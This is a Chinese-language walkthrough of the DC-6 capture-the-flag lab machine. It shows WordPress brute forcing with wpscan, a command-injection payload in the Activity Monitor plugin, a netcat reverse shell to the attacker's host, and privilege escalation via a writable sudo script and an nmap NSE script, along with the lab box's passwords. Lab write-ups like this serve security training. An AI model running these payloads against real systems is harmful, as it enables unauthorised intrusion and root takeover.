打靶系列之DC-6

01 项目安装

先把DC-6的靶机安装到本地

下载地址是：https://www.five86.com/dc-6.html

进入页面点击here 进行下载

下载好之后，导入咱们的虚拟机

看到这个页面，表示我们靶机安装成功

02 信息收集

首先我们进行信息收集，获取靶机的ip和相关端口

#获取ip地址
netdiscover -r  192.168.1.0/24

知道了Ip，看下靶机开放了哪些端口

#获取端口
nmap -A  192.168.1.148

可以看到靶机开放了80端口和22端口，访问一下页面

可惜的是访问不了，因为做了域名绑定，所以需要我们在本地做个域名映射，这个和之前DC-2是一样的问题

打开C:\Windows\System32\drivers\etc下的hosts文件

在末尾加入

192.168.1.148 wordy (记住写上自己靶机的IP)

ok，访问成功

当然咱们kali也需要进行进行配置

vi  /etc/hosts
# 将 192.168.1.148   wordy 加入末尾

保存退出

03 指纹识别

在页面查看一番，很明显这个是WordPress开发的，后台也是特定的是wp-admin，访问一下

后台也获取到

既然已经知道是WordPress，那我们可以使用一个神器工具 wpscan ，这个工具是专门用来扫描WordPress 漏洞的黑盒子扫描器

在kali中执行

# 获取可能存在的用户名
wpscan  --url  http://wordy/ -e u

用户名为：admin，mark，graham，sarah，jens

既然获取到了用户名，现在只需要获得密码，就可以直接爆破

寻找了一番，发现DC-6的作者已经把密码告诉我了我们：https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

在kali中执行

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

可以看到密码已经获取到

创建个username.txt文件，把之前的用户名放入里面，准备开始爆破

执行

wpscan –url http://wordy –U username.txt –P passwords.txt

获取到账户名为: mark，密码是: helpdesk01

登录成功

04 漏洞利用

登录后台之后可以看到 activity monitor插件，百度了一下，发现这个插件是可以被利用

点击Lookup, 使用pb抓包

127.0.0.1|cat /etc/passwd

直接获取了服务器账户信息

可以反弹shell

kill输入

nc -lvvp 1234

在bp中输入

nc -e /bin/sh 192.168.1.116 1234

获取shell成功

执行

#获取正向的shell
python -c  'import pty;pty.spawn ( "/bin/bash")'

05 提权

在服务器一通查询，发现在 /home/mark/stuff 目录下有个things-to-do.txt文件

查看一下发现居然有服务器账号和密码

graham - GSo7isUM1D4- done

尝试ssh登录

ssh graham@127.0.0.1

登录成功

在/home/jens文件下看到backups.sh脚本

执行

sudo -l

发现无密码执行权限，利用这个sh脚本可以直接获取到jens的shell

执行一下命令

#将脚本中的内容清空
cat /dev/null > backups.sh

#将/bin/bash写入backups.sh文件中
echo "/bin/bash" >> backups.sh

执行

#使用jens用户执行sh脚本文件即可获取shell
sudo -u jens ./backups.sh

成功拿到jens用户的shell

执行

#查看jens权限
sudo -l

可以看到这里可以利用nmap进行提权

进入/home/jens目录，执行下面两条命令

#将os.execute('/bin/bash')写入到root.nse文件中
echo "os.execute('/bin/bash')" >> root.nse

#利用nmap插件执行 /bin/bash 来获取root权限
sudo nmap --script=root.nse

可以看到提权成功！

获取到目标！

06 总结

1. 熟悉activity monitor插件进行漏洞利用
2. 从服务器中寻找蛛丝马迹，获取其他账户的账户名和密码
3. 使用服务器脚本获取shell
4. 利用nmap进行提权操作